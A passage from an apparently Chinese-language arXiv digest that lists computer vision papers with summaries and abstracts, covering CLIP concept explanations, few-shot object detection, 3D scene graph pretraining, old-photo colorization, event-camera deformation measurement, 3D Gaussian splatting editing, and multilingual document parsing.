【速读】:该论文旨在解决大规模视觉语言模型(如CLIP)在零样本图像识别中预测结果缺乏可解释性的问题,同时克服概念瓶颈模型(Concept Bottleneck Models)因依赖概念标注监督而难以泛化到未见类别的局限。其解决方案的关键在于提出EZPC方法,通过将CLIP的联合图像-文本嵌入投影到由语言描述学习的概念空间中,实现无需额外监督即可对CLIP的预测提供忠实且透明的概念级解释;该投影通过对齐与重建目标联合优化,确保概念激活既保留CLIP的语义结构又具备人类可理解性。
链接: https://arxiv.org/abs/2603.28211
作者: Onat Ozdemir,Anders Christensen,Stephan Alaniz,Zeynep Akata,Emre Akbas
机构: University of Edinburgh (爱丁堡大学); Middle East Technical University (METU) (中东技术大学); Orbital (轨道公司); DTU Compute, Technical University of Denmark (丹麦技术大学计算机系); Dept. of Biology, University of Copenhagen (哥本哈根大学生物系); LTCI, Télécom Paris, Institut Polytechnique de Paris (巴黎电信学院LTCI实验室,巴黎综合理工学院); Technical University of Munich (TUM) (慕尼黑工业大学); Helmholtz Munich (慕尼黑亥姆霍兹研究中心); MCML; MDSI; Robotics AI Center (ROMER), METU (中东技术大学机器人与人工智能中心)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:Large-scale vision-language models such as CLIP have achieved remarkable success in zero-shot image recognition, yet their predictions remain largely opaque to human understanding. In contrast, Concept Bottleneck Models provide interpretable intermediate representations by reasoning through human-defined concepts, but they rely on concept supervision and lack the ability to generalize to unseen classes. We introduce EZPC that bridges these two paradigms by explaining CLIP’s zero-shot predictions through human-understandable concepts. Our method projects CLIP’s joint image-text embeddings into a concept space learned from language descriptions, enabling faithful and transparent explanations without additional supervision. The model learns this projection via a combination of alignment and reconstruction objectives, ensuring that concept activations preserve CLIP’s semantic structure while remaining interpretable. Extensive experiments on five benchmark datasets, CIFAR-100, CUB-200-2011, Places365, ImageNet-100, and ImageNet-1k, demonstrate that our approach maintains CLIP’s strong zero-shot classification accuracy while providing meaningful concept-level explanations. By grounding open-vocabulary predictions in explicit semantic concepts, our method offers a principled step toward interpretable and trustworthy vision-language models. Code is available at this https URL.
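"将 CLIP 嵌入投影到由语言描述学习的概念空间"最直观的形式,是以图像嵌入与各概念文本嵌入的归一化相似度作为概念激活。下面是这一思想的玩具示意(EZPC 实际通过对齐+重建目标学习该投影,此处的概念向量均为假想):

```python
import numpy as np

def concept_activations(img_emb, concept_embs):
    """Cosine similarity between an image embedding and each concept embedding."""
    img = img_emb / np.linalg.norm(img_emb)
    con = concept_embs / np.linalg.norm(concept_embs, axis=1, keepdims=True)
    return con @ img

# Hypothetical 4-dim embeddings for 3 concepts: "striped", "four-legged", "metallic".
concepts = np.array([[1.0, 0.0, 0.0, 0.0],
                     [0.0, 1.0, 0.0, 0.0],
                     [0.0, 0.0, 1.0, 0.0]])
img = np.array([0.9, 0.4, 0.0, 0.1])        # an image that is mostly "striped"
act = concept_activations(img, concepts)
top = int(np.argmax(act))                    # index of the dominant concept
```

概念激活向量 `act` 既可直接用于零样本判别,也可作为人类可读的解释:每个分量对应一个自然语言概念的"存在强度"。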
[CV-60] A Closer Look at Cross-Domain Few-Shot Object Detection: Fine-Tuning Matters and Parallel Decoder Helps CVPR2026
【速读】:该论文旨在解决少样本目标检测(Few-shot Object Detection, FSOD)中因训练样本稀缺导致的优化不稳定和泛化能力不足的问题。其解决方案的关键在于提出一种混合集成解码器(hybrid ensemble decoder),该结构由一个共享的分层解码层与多个并行的解码分支组成,每个分支使用从共享层继承或新初始化的去噪查询(denoising queries)以增强预测多样性;同时引入统一的渐进式微调框架与基于平台感知的学习率调度策略,从而在不增加额外参数的前提下提升模型泛化性能,并实现稳定高效的少样本适应。
链接: https://arxiv.org/abs/2603.28182
作者: Xuanlong Yu,Youyang Sha,Longfei Liu,Xi Shen,Di Yang
机构: Intellindust AI Lab; Suzhou Institute for Advanced Research, USTC
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at CVPR 2026
Abstract:Few-shot object detection (FSOD) is challenging due to unstable optimization and limited generalization arising from the scarcity of training samples. To address these issues, we propose a hybrid ensemble decoder that enhances generalization during fine-tuning. Inspired by ensemble learning, the decoder comprises a shared hierarchical layer followed by multiple parallel decoder branches, where each branch employs denoising queries either inherited from the shared layer or newly initialized to encourage prediction diversity. This design fully exploits pretrained weights without introducing additional parameters, and the resulting diverse predictions can be effectively ensembled to improve generalization. We further leverage a unified progressive fine-tuning framework with a plateau-aware learning rate schedule, which stabilizes optimization and achieves strong few-shot adaptation without complex data augmentations or extensive hyperparameter tuning. Extensive experiments on CD-FSOD, ODinW-13, and RF100-VL validate the effectiveness of our approach. Notably, on RF100-VL, which includes 100 datasets across diverse domains, our method achieves an average performance of 41.9 in the 10-shot setting, significantly outperforming the recent approach SAM3, which obtains 35.7. We further construct a mixed-domain test set from CD-FSOD to evaluate robustness to out-of-distribution (OOD) samples, showing that our proposed modules lead to clear improvement gains. These results highlight the effectiveness, generalization, and robustness of the proposed method. Code is available at: this https URL.
[CV-61] ToLL: Topological Layout Learning with Structural Multi-view Augmentation for 3D Scene Graph Pretraining
【速读】:该论文旨在解决3D场景图(3DSG)生成中因数据稀缺导致的泛化能力受限问题,现有方法要么依赖大量谓词标注(predicate annotations),要么因物体先验过强而忽略谓词关系学习,难以提供无标签且鲁棒的自监督预训练任务。其解决方案的关键在于提出一种拓扑布局学习(Topological Layout Learning, ToLL)框架,核心创新包括:1)设计锚点条件下的拓扑几何推理机制(Anchor-Conditioned Topological Geometry Reasoning),利用稀疏锚点的空间先验通过图神经网络(GNN)恢复零中心子图的全局布局,并由谓词特征严格调控,从而强制学习谓词关系;2)构建结构化多视角增强策略(Structural Multi-view Augmentation),避免语义污染并借助自蒸馏提升表征质量。实验证明,该方法在3DSSG数据集上显著提升了表示质量,优于当前最优基线。
链接: https://arxiv.org/abs/2603.28178
作者: Yucheng Huang,Luping Ji,Xiangwei Jiang,Wen Li,Mao Ye
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Under Review
Abstract:3D Scene Graph (3DSG) generation plays a pivotal role in spatial understanding and semantic-affordance perception. However, its generalizability is often constrained by data scarcity. Current solutions primarily focus on cross-modal assisted representation learning and object-centric generation pre-training. The former relies heavily on predicate annotations, while the latter’s predicate learning may be bypassed due to strong object priors. Consequently, they often fail to provide a label-free and robust self-supervised proxy task for 3DSG fine-tuning. To bridge this gap, we propose a Topological Layout Learning (ToLL) framework for 3DSG pretraining. In detail, we design an Anchor-Conditioned Topological Geometry Reasoning, with a GNN to recover the global layout of zero-centered subgraphs by the spatial priors from sparse anchors. This process is strictly modulated by predicate features, thereby enforcing predicate relation learning. Furthermore, we construct a Structural Multi-view Augmentation to avoid semantic corruption and enhance representations via self-distillation. Extensive experiments on the 3DSSG dataset demonstrate that our ToLL improves representation quality, outperforming state-of-the-art baselines.
[CV-62] ColorFLUX: A Structure-Color Decoupling Framework for Old Photo Colorization CVPR26
【速读】:该论文旨在解决老照片(old photos)在颜色恢复过程中存在的准确性不足问题,其核心挑战源于老照片特有的退化特征(如亮度衰减和色相偏移),这些特征与现代照片分布存在显著域差距(domain gap),导致现有修复模型在色彩还原时效果不佳。解决方案的关键在于提出一种基于生成扩散模型FLUX的新型老照片着色框架,其中引入结构-色彩解耦策略(structure-color decoupling strategy),将结构保持与色彩恢复分离处理,从而在保留原始结构信息的同时实现精准色彩重建;同时结合渐进式直接偏好优化(progressive Direct Preference Optimization, Pro-DPO)机制,通过粗到细的颜色增强过渡学习细微色彩偏好,并引入视觉语义提示(visual semantic prompts)以提取老照片中细粒度语义信息,有效缓解因历史影像固有色彩偏差带来的失真问题。
链接: https://arxiv.org/abs/2603.28162
作者: Bingchen Li,Zhixin Wang,Fan Li,Jiaqi Xu,Jiaming Guo,Renjing Pei,Xin Li,Zhibo Chen
机构: University of Science and Technology of China(中国科学技术大学); Huawei Noah’s Ark Lab(华为诺亚方舟实验室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR26
Abstract:Old photos preserve invaluable historical memories, making their restoration and colorization highly desirable. While existing restoration models can address some degradation issues like denoising and scratch removal, they often struggle with accurate colorization. This limitation arises from the unique degradation inherent in old photos, such as faded brightness and altered color hues, which are different from modern photo distributions, creating a substantial domain gap during colorization. In this paper, we propose a novel old photo colorization framework based on the generative diffusion model FLUX. Our approach introduces a structure-color decoupling strategy that separates structure preservation from color restoration, enabling accurate colorization of old photos while maintaining structural consistency. We further enhance the model with a progressive Direct Preference Optimization (Pro-DPO) strategy, which allows the model to learn subtle color preferences through coarse-to-fine transitions in color augmentation. Additionally, we address the limitations of text-based prompts by introducing visual semantic prompts, which extract fine-grained semantic information directly from old photos, helping to eliminate the color bias inherent in old photos. Experimental results on both synthetic and real datasets demonstrate that our approach outperforms existing state-of-the-art colorization methods, including closed-source commercial models, producing high-quality and vivid colorization.
[CV-63] Event-Based Method for High-Speed 3D Deformation Measurement under Extreme Illumination Conditions
【速读】:该论文旨在解决传统相机在极端光照条件下难以准确测量大型工程结构(如航天发射塔和悬索桥)高速三维形变的问题,因其动态范围有限导致过曝。解决方案的关键在于提出一种基于多事件相机阵列的集成方法,利用事件相机(event camera)异步事件流特性与时间相关性分析提取标记点中心,并通过求解Kruppa方程结合参数优化实现快速标定,最终借助统一坐标变换与线性交会法完成高精度三维形变测量,实验表明相对误差低于0.1%,验证了其在恶劣光照环境下的有效性。
链接: https://arxiv.org/abs/2603.28159
作者: Banglei Guan,Yifei Bian,Zibin Liu,Haoyang Li,Xuanyu Bai,Taihang Lei,Bin Li,Yang Shang,Qifeng Yu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Exp Mech (2026)
Abstract:Background: Large engineering structures, such as space launch towers and suspension bridges, are subjected to extreme forces that cause high-speed 3D deformation and compromise safety. These structures typically operate under extreme illumination conditions. Traditional cameras often struggle to handle strong light intensity, leading to overexposure due to their limited dynamic range. Objective: Event cameras have emerged as a compelling alternative to traditional cameras in high dynamic range and low-latency applications. This paper presents an integrated method, from calibration to measurement, using a multi-event camera array for high-speed 3D deformation monitoring of structures in extreme illumination conditions. Methods: Firstly, the proposed method combines the characteristics of the asynchronous event stream and temporal correlation analysis to extract the corresponding marker center point. Subsequently, the method achieves rapid calibration by solving the Kruppa equations in conjunction with a parameter optimization framework. Finally, by employing a unified coordinate transformation and linear intersection, the method enables the measurement of 3D deformation of the target structure. Results: Experiments confirmed that the relative measurement error is below 0.08%. Field experiments under extreme illumination conditions, including self-calibration of a multi-event camera array and 3D deformation measurement, verified the performance of the proposed method. Conclusions: This paper addressed the critical limitation of traditional cameras in measuring high-speed 3D deformations under extreme illumination conditions. The experimental results demonstrate that, compared to other methods, the proposed method can accurately measure 3D deformations of structures under harsh lighting conditions, and the relative error of the measured deformation is less than 0.1%. 
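The "linear intersection" step of the measurement pipeline, recovering a 3D marker position from two calibrated views, can be sketched with the standard direct linear transform (DLT). This is a generic illustration, not the paper's implementation; the projection matrices and the observed point below are toy values.

```python
import numpy as np

def triangulate_dlt(P1, P2, x1, x2):
    """Linear intersection (DLT): recover a 3D point from two calibrated
    views. P1, P2 are 3x4 projection matrices; x1, x2 are (u, v) image
    observations of the same marker center."""
    A = np.array([
        x1[0] * P1[2] - P1[0],
        x1[1] * P1[2] - P1[1],
        x2[0] * P2[2] - P2[0],
        x2[1] * P2[2] - P2[1],
    ])
    # The homogeneous 3D point is the (least-squares) null vector of A.
    _, _, Vt = np.linalg.svd(A)
    X = Vt[-1]
    return X[:3] / X[3]

# Two toy cameras observing the point (1, 2, 10).
P1 = np.hstack([np.eye(3), np.zeros((3, 1))])               # camera at origin
P2 = np.hstack([np.eye(3), np.array([[-1.0], [0], [0]])])   # shifted baseline
X_true = np.array([1.0, 2.0, 10.0, 1.0])
x1 = P1 @ X_true; x1 = x1[:2] / x1[2]
x2 = P2 @ X_true; x2 = x2[:2] / x2[2]
X = triangulate_dlt(P1, P2, x1, x2)
print(np.round(X, 6))  # ≈ [1, 2, 10]
```

In the paper's setting the projection matrices come from the Kruppa-equation self-calibration step, and one point is triangulated per marker per event-stream time slice.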
[CV-64] ObjectMorpher: 3D-Aware Image Editing via Deformable 3DGS Models
【速读】:该论文旨在解决图像编辑中缺乏精确的物体级控制问题,现有2D方法因缺乏3D感知常导致结果模糊或不真实,而现有3D-aware方法则依赖复杂的优化或不完整的单目重建。其解决方案的关键在于提出一个统一且交互式的框架ObjectMorpher,通过图像到3D生成器将目标实例提升为可编辑的3D高斯溅射(3D Gaussian Splatting, 3DGS)表示,从而实现基于几何约束的快速、保身份的操作;用户通过拖拽控制点触发基于图结构的非刚性形变(采用尽可能刚性(as-rigid-as-possible, ARAP)约束),确保形状与姿态变化符合物理合理性,并结合复合扩散模块协调光照、色彩和边界以实现无缝重融合,显著提升了编辑的精细度、真实感及可控性。
链接: https://arxiv.org/abs/2603.28152
作者: Yuhuan Xie,Aoxuan Pan,Yi-Hua Huang,Chirui Chang,Peng Dai,Xin Yu,Xiaojuan Qi
机构: The University of Hong Kong (香港大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 11 pages, 8 figures
Abstract:Achieving precise, object-level control in image editing remains challenging: 2D methods lack 3D awareness and often yield ambiguous or implausible results, while existing 3D-aware approaches rely on heavy optimization or incomplete monocular reconstructions. We present ObjectMorpher, a unified, interactive framework that converts ambiguous 2D edits into geometry-grounded operations. ObjectMorpher lifts target instances with an image-to-3D generator into editable 3D Gaussian Splatting (3DGS), enabling fast, identity-preserving manipulation. Users drag control points; a graph-based non-rigid deformation with as-rigid-as-possible (ARAP) constraints ensures physically sensible shape and pose changes. A composite diffusion module harmonizes lighting, color, and boundaries for seamless reintegration. Across diverse categories, ObjectMorpher delivers fine-grained, photorealistic edits with superior controllability and efficiency, outperforming 2D drag and 3D-aware baselines on KID, LPIPS, SIFID, and user preference.
[CV-65] BlankSkip: Early-exit Object Detection onboard Nano-drones CVPR
【速读】:该论文旨在解决在资源受限的纳米无人机(nano-sized drones)上部署轻量级目标检测(Object Detection, OD)模型时面临的计算约束问题,即如何在有限的内存(约10 MiB)和功耗(1 W)条件下实现高效的目标检测。解决方案的关键在于提出一种名为BlankSkip的自适应网络架构,其通过引入一个简单的辅助分类任务(auxiliary classification task)来实现早期退出机制——当输入帧中无感兴趣目标时,网络可提前终止推理流程,从而显著降低平均推理延迟。实验表明,在真实纳米无人机平台Bitcraze Crazyflie 2.1上,该方法相较静态MobileNet-SSD模型实现了最高24%的吞吐量提升,且仅带来0.015的mAP性能下降。
链接: https://arxiv.org/abs/2603.28149
作者: Carlo Marra,Beatrice Alessandra Motetti,Alessio Burrello,Enrico Macii,Massimo Poncino,Daniele Jahier Pagliari
机构: Politecnico di Torino (都灵理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted for publication in the Embedded Vision Workshop of the 2026 Computer Vision and Pattern Recognition (CVPR) conference
Abstract:Deploying tiny computer vision Deep Neural Networks (DNNs) on-board nano-sized drones is key for achieving autonomy, but is complicated by the extremely tight constraints of their computational platforms (approximately 10 MiB memory, 1 W power budget). Early-exit adaptive DNNs that dial down the computational effort for “easy-to-process” input frames represent a promising way to reduce the average inference latency. However, while this approach is extensively studied for classification, its application to dense tasks like object detection (OD) is not straightforward. In this paper, we propose BlankSkip, an adaptive network for on-device OD that leverages a simple auxiliary classification task for early exit, i.e., identifying frames with no objects of interest. With experiments using a real-world nano-drone platform, the Bitcraze Crazyflie 2.1, we achieve up to 24% average throughput improvement with a limited 0.015 mean Average Precision (mAP) drop compared to a static MobileNet-SSD detector, on a state-of-the-art nano-drones OD dataset.
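The early-exit idea, a cheap auxiliary classifier that flags "blank" frames so the expensive detection head can be skipped, can be sketched as below. All module names, layer sizes, and the exit threshold are illustrative assumptions, not BlankSkip's actual architecture.

```python
import torch
import torch.nn as nn

class EarlyExitDetector(nn.Module):
    """Sketch: an auxiliary binary head decides from backbone features
    whether any object is present; if not, the detection head is skipped."""
    def __init__(self, feat_dim=64, num_anchors=16):
        super().__init__()
        self.backbone = nn.Sequential(nn.Conv2d(3, feat_dim, 3, 2, 1), nn.ReLU())
        self.blank_head = nn.Sequential(          # cheap auxiliary classifier
            nn.AdaptiveAvgPool2d(1), nn.Flatten(), nn.Linear(feat_dim, 1))
        self.det_head = nn.Conv2d(feat_dim, num_anchors * 5, 1)  # boxes + score

    def forward(self, x, exit_threshold=0.5):
        feats = self.backbone(x)
        p_object = torch.sigmoid(self.blank_head(feats))
        if p_object.max() < exit_threshold:       # "blank" frame: exit early
            return None
        return self.det_head(feats)               # full detection pass

model = EarlyExitDetector().eval()
with torch.no_grad():
    out = model(torch.zeros(1, 3, 64, 64))        # either None or a dense map
```

The average-latency saving then scales with the fraction of frames classified as blank, which is what drives the reported 24% throughput gain.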
[CV-66] RecycleLoRA: Rank-Revealing QR-Based Dual-LoRA Subspace Adaptation for Domain Generalized Semantic Segmentation CVPR2026
【速读】:该论文旨在解决领域泛化语义分割(Domain Generalized Semantic Segmentation, DGSS)中模型在未见目标域上性能下降的问题,特别是针对视觉基础模型(Vision Foundation Models, VFMs)中潜在子空间结构未被充分挖掘、以及LoRA组件表示多样性不足与参数利用效率低下的挑战。解决方案的关键在于提出RecycleLoRA框架,其核心创新是采用Rank-Revealing QR分解(RRQR)系统性地解析VFMs的子空间结构,从而指导主适配器(main adapter)学习由RRQR识别出的次要子空间方向上的多样化且独立的特征表示,同时引入次级适配器(sub adapter)对主要方向进行轻量级微调以提供互补优化。这种双适配器设计无需额外正则化损失即可实现差异化的表征学习,并通过RRQR初始化显著提升领域泛化能力,在合成到真实和真实到真实场景下均达到当前最优性能,且不增加推理延迟。
链接: https://arxiv.org/abs/2603.28142
作者: Chanseul Cho,Seokju Yun,Jeaseong Jeon,Seungjae Moon,Youngmin Ro
机构: University of Seoul (首尔大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted to CVPR 2026 (Findings)
Abstract:Domain Generalized Semantic Segmentation (DGSS) aims to maintain robust performance across unseen target domains. Vision Foundation Models (VFMs) offer rich multi-domain knowledge that can enhance generalization. However, strategies for actively exploiting the rich subspace structures within VFMs remain under-explored, with many existing methods focusing primarily on preserving pre-trained knowledge. Furthermore, their LoRA components often suffer from limited representational diversity and inefficient parameter utilization. We propose RecycleLoRA, which addresses both challenges by employing Rank-Revealing QR Decomposition (RRQR) to systematically exploit VFM’s subspace structures and enhance LoRA’s representational richness. Our main adapter leverages minor subspace directions identified by RRQR to learn diverse and independent features, achieving competitive performance even when used alone. We further introduce a sub adapter that carefully refines major directions with minimal adjustments, providing complementary improvements to the main adapter’s strong baseline performance. This design enables the dual adapters to learn distinct representations without requiring additional regularization losses. Our systematic exploitation of pre-trained subspace structures through RRQR-based initialization leads to superior domain generalization performance. RecycleLoRA achieves state-of-the-art performance on both synthetic-to-real generalization and real-to-real generalization tasks without complex architectures or additional inference latency.
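The core linear-algebra tool here, Rank-Revealing QR, can be illustrated with SciPy's column-pivoted QR: pivoting orders columns by how much new subspace energy they contribute, so the leading directions approximate the "major" subspace and the trailing ones the "minor" subspace. The matrix, rank, and major/minor split below are illustrative, not the paper's adapter construction.

```python
import numpy as np
from scipy.linalg import qr

rng = np.random.default_rng(0)
# A weight-like matrix with rapidly decaying spectrum (stand-in for a VFM layer).
W = rng.standard_normal((64, 64)) @ np.diag(np.logspace(0, -3, 64)) \
    @ rng.standard_normal((64, 64))

# Column-pivoted QR is rank-revealing in practice: Q's leading columns span
# the dominant column space, trailing columns the minor directions.
Q, R, piv = qr(W, pivoting=True)

r = 8                      # adapter rank (illustrative)
major = Q[:, :r]           # dominant directions -> lightly-tuned "sub adapter"
minor = Q[:, -r:]          # minor directions -> diverse "main adapter" init

print(np.allclose(major.T @ major, np.eye(r)))  # orthonormal basis: True
```

Both bases are orthonormal by construction, which is what lets the dual adapters learn distinct representations without an extra regularization loss.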
[CV-67] Intelligent Road Condition Monitoring using 3D In-Air SONAR Sensing
【速读】:该论文旨在解决道路表面状况监测问题,特别是在恶劣环境条件下(如大雨、烟雾或雾霾)传统传感器(如摄像头和激光雷达)性能下降的问题。研究提出利用空气中三维声纳(in-air 3D SONAR)传感器作为鲁棒的感知模态,实现道路材料分类与道路损伤检测与分类两个任务。解决方案的关键在于:首先构建一个统一标注的数据集,涵盖不同类型的路面损伤及材料标签;其次通过单个SONAR传感器数据完成两类任务——材料分类(沥青、混凝土和元素路)准确率接近90% F1分数,而损伤检测准确率约为75% F1分数,表明SONAR在复杂环境下具备良好适用性,可集成进基于机会感知(opportunistic sensing)的道路养护管理系统,但需进一步提升损伤识别精度以满足实际应用需求。
链接: https://arxiv.org/abs/2603.28141
作者: Amber Cassimon,Robin Kerstens,Walter Daems,Jan Steckel
机构: University of Antwerp (安特卫普大学); Flanders Make Strategic Research Centre (弗拉芒制造战略研究中心)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 10 pages, 9 figures, 2 tables
Abstract:In this paper, we investigate the capabilities of in-air 3D SONAR sensors for the monitoring of road surface conditions. Concretely, we consider two applications: Road material classification and Road damage detection and classification. While such tasks can be performed with other sensor modalities, such as camera sensors and LiDAR sensors, these sensor modalities tend to fail in harsh sensing conditions, such as heavy rain, smoke or fog. By using a sensing modality that is robust to such interference, we enable the creation of opportunistic sensing applications, where vehicles performing other tasks (garbage collection, mail delivery, etc.) can also be used to monitor the condition of the road. For these tasks, we use a single dataset, in which different types of damages are annotated, with labels including the material of the road surface. In the material classification task, we differentiate between three different road materials: Asphalt, Concrete and Element roads. In the damage detection and classification task, we determine if there is damage, and what type of damage (independent of material type), without localizing the damage. We are successful in determining the road surface type from SONAR sensor data, with F1 scores approaching 90% on the test set, but find that for the detection of damages performance lags, with F1 scores around 75%. From this, we conclude that SONAR sensing is a promising modality to include in opportunistic sensing-based pavement management systems, but that further research is needed to reach the desired accuracy.
[CV-68] Robust Remote Sensing Image-Text Retrieval with Noisy Correspondence
【速读】:该论文针对遥感图像-文本检索(Remote Sensing Image-Text Retrieval, RSITR)中普遍存在的“噪声对应关系”(Noisy Correspondence, NC)问题展开研究,即现有方法通常假设图像与文本描述完全对齐,但在实际数据集中存在大量不准确或错配的样本对,导致模型性能下降。解决方案的关键在于提出一种鲁棒的遥感图像-文本检索(Robust Remote Sensing Image-Text Retrieval, RRSITR)范式,其核心创新是引入自 paced learning(自适应学习策略),模拟人类认知从易到难的学习过程:首先根据每对样本的损失值将训练数据分为三类(干净、模糊、噪声样本),并通过动态加权机制估计各对样本的可靠性;进一步设计多模态自 paced 函数以动态调节训练顺序和权重,实现渐进式学习;最后,针对噪声样本对提出一种基于语义相似度动态调整软边距的鲁棒三元组损失函数,从而显著提升模型在高噪声率场景下的鲁棒性与性能。
链接: https://arxiv.org/abs/2603.28134
作者: Qiya Song,Yiqiang Xie,Yuan Sun,Renwei Dian,Xudong Kang
机构: Hunan Normal University (湖南师范大学); Sichuan University (四川大学); Hunan University (湖南大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:As a pivotal task that bridges remote visual and linguistic understanding, Remote Sensing Image-Text Retrieval (RSITR) has attracted considerable research interest in recent years. However, almost all RSITR methods implicitly assume that image-text pairs are matched perfectly. In practice, acquiring a large set of well-aligned data pairs is often prohibitively expensive or even infeasible. In addition, we also notice that remote sensing datasets (e.g., RSITMD) in fact contain some inaccurate or mismatched image-text descriptions. Based on the above observations, we reveal an important but untouched problem in RSITR, i.e., Noisy Correspondence (NC). To overcome these challenges, we propose a novel Robust Remote Sensing Image-Text Retrieval (RRSITR) paradigm that designs a self-paced learning strategy to mimic human cognitive learning patterns, thereby learning from easy to hard on multi-modal data with NC. Specifically, we first divide all training sample pairs into three categories based on the loss magnitude of each pair, i.e., clean sample pairs, ambiguous sample pairs, and noisy sample pairs. Then, we estimate the reliability of each training pair by assigning it a weight based on its loss value. Further, we design a new multi-modal self-paced function to dynamically regulate the training sequence and weights of the samples, thus establishing a progressive learning process. Finally, for noisy sample pairs, we present a robust triplet loss to dynamically adjust the soft margin based on semantic similarity, thereby enhancing the robustness against noise. Extensive experiments on three popular benchmark datasets demonstrate that the proposed RRSITR significantly outperforms the state-of-the-art methods, especially at high noise rates. The code is available at: this https URL
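The loss-based weighting at the heart of self-paced learning can be sketched with the classic hard/linear self-paced regularizers: low-loss (likely clean) pairs get weight near 1, high-loss (likely noisy) pairs near 0, and the age parameter grows over training to admit harder samples. This is the generic SPL rule, not the paper's exact multi-modal self-paced function.

```python
import numpy as np

def self_paced_weights(losses, lam, mode="linear"):
    """Classic self-paced weighting. `lam` is the age parameter:
    as it grows over training, harder (higher-loss) samples are
    progressively admitted with nonzero weight."""
    losses = np.asarray(losses, dtype=float)
    if mode == "hard":
        return (losses < lam).astype(float)        # binary easy/hard split
    return np.clip(1.0 - losses / lam, 0.0, 1.0)   # linear regularizer

# Four pairs: clean, ambiguous, and two likely-noisy ones.
losses = np.array([0.1, 0.5, 1.2, 3.0])
w = self_paced_weights(losses, lam=1.0)
print(w)  # [0.9 0.5 0.  0. ]
```

In the paper the weights additionally depend on the clean/ambiguous/noisy partition, and noisy pairs are handled by the soft-margin robust triplet loss instead of being simply down-weighted.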
[CV-69] MDPBench: A Benchmark for Multilingual Document Parsing in Real-World Scenarios
【速读】:该论文旨在解决多语言文档解析(Document Parsing)领域缺乏系统性评估基准的问题,尤其是在非拉丁语系、低资源语言以及真实拍摄文档上的性能表现未被充分研究。现有模型大多仅在高质量数字文档上训练和测试,无法反映实际应用场景中的多样性与挑战。解决方案的关键在于构建首个多语言文档解析基准(Multilingual Document Parsing Benchmark, MDPBench),包含3,400张跨17种语言、多种书写系统及不同拍摄条件的文档图像,并通过专家模型标注、人工校正与人工验证的严格流程确保标注质量;同时划分公开与私有测试集以防止数据泄露并保障公平比较。实验表明,闭源模型(如Gemini 3-Pro)表现稳健,而开源模型在非拉丁语系和拍摄文档上性能显著下降(平均下降17.8%和14.0%),揭示了当前模型在多语言场景下的不平衡问题,并为开发更具包容性和部署可行性的文档解析系统指明方向。
链接: https://arxiv.org/abs/2603.28130
作者: Zhang Li,Zhibo Lin,Qiang Liu,Ziyang Zhang,Shuo Zhang,Zidun Guo,Jiajun Song,Jiarui Zhang,Xiang Bai,Yuliang Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:We introduce Multilingual Document Parsing Benchmark, the first benchmark for multilingual digital and photographed document parsing. Document parsing has made remarkable strides, yet almost exclusively on clean, digital, well-formatted pages in a handful of dominant languages. No systematic benchmark exists to evaluate how models perform on digital and photographed documents across diverse scripts and low-resource languages. MDPBench comprises 3,400 document images spanning 17 languages, diverse scripts, and varied photographic conditions, with high-quality annotations produced through a rigorous pipeline of expert model labeling, manual correction, and human verification. To ensure fair comparison and prevent data leakage, we maintain separate public and private evaluation splits. Our comprehensive evaluation of both open-source and closed-source models uncovers a striking finding: while closed-source models (notably Gemini3-Pro) prove relatively robust, open-source alternatives suffer dramatic performance collapse, particularly on non-Latin scripts and real-world photographed documents, with an average drop of 17.8% on photographed documents and 14.0% on non-Latin scripts. These results reveal significant performance imbalances across languages and conditions, and point to concrete directions for building more inclusive, deployment-ready parsing systems. Source available at this https URL.
[CV-70] SVGS: Single-View to 3D Object Editing via Gaussian Splatting
【速读】:该论文旨在解决文本驱动的3D场景编辑中存在的一致性差与效率低的问题。现有方法依赖隐式3D表示(如NeRF)时,虽能渲染复杂场景但处理速度慢且难以精确控制特定区域;而基于多视角编辑策略的方法(如Instruct-NeRF2NeRF和GaussianEditor)在执行文本指令时易导致不同视图间结果不一致,影响整体编辑质量与效率平衡。其解决方案的关键在于提出一种基于3D高斯点绘(3D Gaussian Splatting, 3DGS)的单视角文本驱动编辑方法SVGS(Single-View to 3D Object Editing via Gaussian Splatting),通过引入基于多视角扩散模型的单视角编辑策略,仅利用产生一致编辑结果的视图重建3D场景,并采用稀疏3D高斯点绘作为表示形式,显著提升编辑效率与一致性。
链接: https://arxiv.org/abs/2603.28126
作者: Pengcheng Xue,Yan Tian,Qiutao Song,Ziyi Wang,Linyang He,Weiping Ding,Mahmoud Hassaballah,Karen Egiazarian,Wei-Fa Yang,Leszek Rutkowski
机构: Zhejiang Gongshang University (浙江工商大学); Jianpei Technology Co., Ltd. (简佩科技有限公司); Nantong University (南通大学); Prince Sattam Bin Abdulaziz University (萨特姆·本·阿卜杜拉兹大学); Qena University (盖纳大学); Tampere University (坦佩雷大学); The University of Hong Kong (香港大学); Polish Academy of Sciences (波兰科学院); AGH University of Krakow (克拉科夫AGH科技大学); SAN University (桑大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Text-driven 3D scene editing has attracted considerable interest due to its convenience and user-friendliness. However, methods that rely on implicit 3D representations, such as Neural Radiance Fields (NeRF), while effective in rendering complex scenes, are hindered by slow processing speeds and limited control over specific regions of the scene. Moreover, existing approaches, including Instruct-NeRF2NeRF and GaussianEditor, which utilize multi-view editing strategies, frequently produce inconsistent results across different views when executing text instructions. This inconsistency can adversely affect the overall performance of the model, complicating the task of balancing the consistency of editing results with editing efficiency. To address these challenges, we propose a novel method termed Single-View to 3D Object Editing via Gaussian Splatting (SVGS), which is a single-view text-driven editing technique based on 3D Gaussian Splatting (3DGS). Specifically, in response to text instructions, we introduce a single-view editing strategy grounded in multi-view diffusion models, which reconstructs 3D scenes by leveraging only those views that yield consistent editing results. Additionally, we employ sparse 3D Gaussian Splatting as the 3D representation, which significantly enhances editing efficiency. We conducted a comparative analysis of SVGS against existing baseline methods across various scene settings, and the results indicate that SVGS outperforms its counterparts in both editing capability and processing speed, representing a significant advancement in 3D editing technology. For further details, please visit our project page at: 